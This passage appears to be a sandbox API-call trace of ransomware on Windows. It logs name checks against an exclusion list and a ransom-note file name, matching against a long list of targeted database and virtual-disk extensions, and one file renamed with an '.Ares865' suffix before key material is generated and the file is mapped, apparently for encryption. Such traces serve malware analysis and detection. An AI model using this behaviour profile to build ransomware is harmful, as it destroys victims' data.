cAlternateFileName="PUBWZI~1.TRX")) returned 1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".") returned 1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="..") returned 1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="windows") returned -1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="bootmgr") returned 1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="temp") returned -1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="pagefile.sys") returned 1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="boot") returned 1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="ids.txt") returned 1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0086.767] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="perflogs") returned 1 [0086.768] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="MSBuild") returned 1 [0086.768] lstrlenW (lpString="PUBWZINT.REST.trx_dll") returned 21 [0086.768] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned 73 [0086.768] lstrcpyW (in: lpString1=0x2cce468, lpString2="PUBWZINT.REST.trx_dll" | out: lpString1="PUBWZINT.REST.trx_dll") returned="PUBWZINT.REST.trx_dll" [0086.768] lstrlenW (lpString="PUBWZINT.REST.trx_dll") returned 21 [0086.768] lstrlenW (lpString="Ares865") returned 7 [0086.768] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.768] lstrlenW (lpString=".dll") returned 4 [0086.768] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".dll") returned 1 [0086.768] lstrlenW (lpString=".lnk") returned 4 [0086.768] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".lnk") returned 1 [0086.768] lstrlenW (lpString=".ini") returned 4 [0086.768] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".ini") returned 1 [0086.768] lstrlenW (lpString=".sys") returned 4 [0086.768] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".sys") returned 1 [0086.768] lstrlenW (lpString="PUBWZINT.REST.trx_dll") returned 21 [0086.768] lstrlenW (lpString="bak") returned 3 [0086.768] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.768] lstrlenW (lpString="ba_") returned 3 [0086.768] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.768] lstrlenW (lpString="dbb") returned 3 [0086.768] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.768] lstrlenW (lpString="vmdk") returned 4 [0086.768] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.768] lstrlenW (lpString="rar") returned 3 [0086.768] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.768] lstrlenW (lpString="zip") returned 3 [0086.768] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.768] lstrlenW (lpString="tgz") returned 3 [0086.768] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.768] lstrlenW (lpString="vbox") returned 4 [0086.768] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.768] lstrlenW (lpString="vdi") returned 3 [0086.768] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.768] lstrlenW (lpString="vhd") returned 3 [0086.768] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.769] lstrlenW (lpString="vhdx") returned 4 [0086.769] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.769] lstrlenW (lpString="avhd") returned 4 [0086.769] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.769] lstrlenW (lpString="db") returned 2 [0086.769] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.769] lstrlenW (lpString="db2") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.769] lstrlenW (lpString="db3") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.769] lstrlenW (lpString="dbf") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.769] lstrlenW (lpString="mdf") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.769] lstrlenW (lpString="mdb") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.769] lstrlenW (lpString="sql") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.769] lstrlenW (lpString="sqlite") returned 6 [0086.769] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.769] lstrlenW (lpString="sqlite3") returned 7 [0086.769] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.769] lstrlenW (lpString="sqlitedb") returned 8 [0086.769] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.769] lstrlenW (lpString="xml") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.769] lstrlenW (lpString="$er") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.769] lstrlenW (lpString="4dd") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.769] lstrlenW (lpString="4dl") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.769] lstrlenW (lpString="^^^") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.769] lstrlenW (lpString="abs") returned 3 [0086.769] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.769] lstrlenW (lpString="abx") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.770] lstrlenW (lpString="accdb") returned 5 [0086.770] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.770] lstrlenW (lpString="accdc") returned 5 [0086.770] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.770] lstrlenW (lpString="accde") returned 5 [0086.770] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.770] lstrlenW (lpString="accdr") returned 5 [0086.770] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.770] lstrlenW (lpString="accdt") returned 5 [0086.770] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.770] lstrlenW (lpString="accdw") returned 5 [0086.770] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.770] lstrlenW (lpString="accft") returned 5 [0086.770] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.770] lstrlenW (lpString="adb") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.770] lstrlenW (lpString="adb") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.770] lstrlenW (lpString="ade") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.770] lstrlenW (lpString="adf") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.770] lstrlenW (lpString="adn") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.770] lstrlenW (lpString="adp") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.770] lstrlenW (lpString="alf") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.770] lstrlenW (lpString="ask") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.770] lstrlenW (lpString="btr") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.770] lstrlenW (lpString="cat") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.770] lstrlenW (lpString="cdb") returned 3 [0086.770] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.771] lstrlenW (lpString="ckp") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.771] lstrlenW (lpString="cma") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.771] lstrlenW (lpString="cpd") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.771] lstrlenW (lpString="dacpac") returned 6 [0086.771] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.771] lstrlenW (lpString="dad") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.771] lstrlenW (lpString="dadiagrams") returned 10 [0086.771] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0086.771] lstrlenW (lpString="daschema") returned 8 [0086.771] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.771] lstrlenW (lpString="db-journal") returned 10 [0086.771] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0086.771] lstrlenW (lpString="db-shm") returned 6 [0086.771] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.771] lstrlenW (lpString="db-wal") returned 6 [0086.771] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.771] lstrlenW (lpString="dbc") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.771] lstrlenW (lpString="dbs") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.771] lstrlenW (lpString="dbt") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.771] lstrlenW (lpString="dbv") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.771] lstrlenW (lpString="dbx") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.771] lstrlenW (lpString="dcb") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.771] lstrlenW (lpString="dct") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.771] lstrlenW (lpString="dcx") returned 3 [0086.771] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.771] lstrlenW (lpString="ddl") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.772] lstrlenW (lpString="dlis") returned 4 [0086.772] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.772] lstrlenW (lpString="dp1") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.772] lstrlenW (lpString="dqy") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.772] lstrlenW (lpString="dsk") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.772] lstrlenW (lpString="dsn") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.772] lstrlenW (lpString="dtsx") returned 4 [0086.772] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.772] lstrlenW (lpString="dxl") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.772] lstrlenW (lpString="eco") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.772] lstrlenW (lpString="ecx") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.772] lstrlenW (lpString="edb") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.772] lstrlenW (lpString="epim") returned 4 [0086.772] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.772] lstrlenW (lpString="fcd") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.772] lstrlenW (lpString="fdb") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.772] lstrlenW (lpString="fic") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.772] lstrlenW (lpString="flexolibrary") returned 12 [0086.772] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0086.772] lstrlenW (lpString="fm5") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.772] lstrlenW (lpString="fmp") returned 3 [0086.772] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.772] lstrlenW (lpString="fmp12") returned 5 [0086.773] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.773] lstrlenW (lpString="fmpsl") returned 5 [0086.773] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.773] lstrlenW (lpString="fol") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.773] lstrlenW (lpString="fp3") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.773] lstrlenW (lpString="fp4") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.773] lstrlenW (lpString="fp5") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.773] lstrlenW (lpString="fp7") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.773] lstrlenW (lpString="fpt") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.773] lstrlenW (lpString="frm") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.773] lstrlenW (lpString="gdb") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.773] lstrlenW (lpString="gdb") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.773] lstrlenW (lpString="grdb") returned 4 [0086.773] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.773] lstrlenW (lpString="gwi") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.773] lstrlenW (lpString="hdb") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.773] lstrlenW (lpString="his") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.773] lstrlenW (lpString="ib") returned 2 [0086.773] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.773] lstrlenW (lpString="idb") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.773] lstrlenW (lpString="ihx") returned 3 [0086.773] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.773] lstrlenW (lpString="itdb") returned 4 [0086.774] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.774] lstrlenW (lpString="itw") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.774] lstrlenW (lpString="jet") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.774] lstrlenW (lpString="jtx") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.774] lstrlenW (lpString="kdb") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.774] lstrlenW (lpString="kexi") returned 4 [0086.774] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.774] lstrlenW (lpString="kexic") returned 5 [0086.774] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.774] lstrlenW (lpString="kexis") returned 5 [0086.774] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.774] lstrlenW (lpString="lgc") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.774] lstrlenW (lpString="lwx") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.774] lstrlenW (lpString="maf") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.774] lstrlenW (lpString="maq") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.774] lstrlenW (lpString="mar") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.774] lstrlenW (lpString="marshal") returned 7 [0086.774] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.774] lstrlenW (lpString="mas") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.774] lstrlenW (lpString="mav") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.774] lstrlenW (lpString="maw") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.774] lstrlenW (lpString="mdbhtml") returned 7 [0086.774] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.774] lstrlenW (lpString="mdn") returned 3 [0086.774] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.775] lstrlenW (lpString="mdt") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.775] lstrlenW (lpString="mfd") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.775] lstrlenW (lpString="mpd") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.775] lstrlenW (lpString="mrg") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.775] lstrlenW (lpString="mud") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.775] lstrlenW (lpString="mwb") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.775] lstrlenW (lpString="myd") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.775] lstrlenW (lpString="ndf") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.775] lstrlenW (lpString="nnt") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.775] lstrlenW (lpString="nrmlib") returned 6 [0086.775] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.775] lstrlenW (lpString="ns2") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.775] lstrlenW (lpString="ns3") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.775] lstrlenW (lpString="ns4") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.775] lstrlenW (lpString="nsf") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.775] lstrlenW (lpString="nv") returned 2 [0086.775] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.775] lstrlenW (lpString="nv2") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.775] lstrlenW (lpString="nwdb") returned 4 [0086.775] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.775] lstrlenW (lpString="nyf") returned 3 [0086.775] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.775] lstrlenW (lpString="odb") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.776] lstrlenW (lpString="odb") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.776] lstrlenW (lpString="oqy") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.776] lstrlenW (lpString="ora") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.776] lstrlenW (lpString="orx") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.776] lstrlenW (lpString="owc") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.776] lstrlenW (lpString="p96") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.776] lstrlenW (lpString="p97") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.776] lstrlenW (lpString="pan") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.776] lstrlenW (lpString="pdb") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.776] lstrlenW (lpString="pdm") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.776] lstrlenW (lpString="pnz") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.776] lstrlenW (lpString="qry") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.776] lstrlenW (lpString="qvd") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.776] lstrlenW (lpString="rbf") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.776] lstrlenW (lpString="rctd") returned 4 [0086.776] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.776] lstrlenW (lpString="rod") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.776] lstrlenW (lpString="rodx") returned 4 [0086.776] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.776] lstrlenW (lpString="rpd") returned 3 [0086.776] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.777] lstrlenW (lpString="rsd") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.777] lstrlenW (lpString="sas7bdat") returned 8 [0086.777] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.777] lstrlenW (lpString="sbf") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.777] lstrlenW (lpString="scx") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.777] lstrlenW (lpString="sdb") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.777] lstrlenW (lpString="sdc") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.777] lstrlenW (lpString="sdf") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.777] lstrlenW (lpString="sis") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.777] lstrlenW (lpString="spq") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.777] lstrlenW (lpString="te") returned 2 [0086.777] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.777] lstrlenW (lpString="teacher") returned 7 [0086.777] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.777] lstrlenW (lpString="tmd") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.777] lstrlenW (lpString="tps") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.777] lstrlenW (lpString="trc") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.777] lstrlenW (lpString="trc") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.777] lstrlenW (lpString="trm") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.777] lstrlenW (lpString="udb") returned 3 [0086.777] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.777] lstrlenW (lpString="udl") returned 3 [0086.778] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.778] lstrlenW (lpString="usr") returned 3 [0086.778] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.778] lstrlenW (lpString="v12") returned 3 [0086.778] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.778] lstrlenW (lpString="vis") returned 3 [0086.778] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.778] lstrlenW (lpString="vpd") returned 3 [0086.778] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.778] lstrlenW (lpString="vvv") returned 3 [0086.778] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.778] lstrlenW (lpString="wdb") returned 3 [0086.778] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.778] lstrlenW (lpString="wmdb") returned 4 [0086.778] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.778] lstrlenW (lpString="wrk") returned 3 [0086.778] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.778] lstrlenW (lpString="xdb") returned 3 [0086.778] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.778] lstrlenW (lpString="xld") returned 3 [0086.778] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.778] lstrlenW (lpString="xmlff") returned 5 [0086.778] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.778] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.Ares865") returned 81 [0086.778] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.779] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.779] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=360288) returned 1 [0086.779] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.780] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.780] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.780] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.780] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.780] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.781] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x58260, lpName=0x0) returned 0x15c [0086.782] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x58260) returned 0x420000 [0086.800] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.801] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.801] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.801] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.801] RtlAllocateHeap 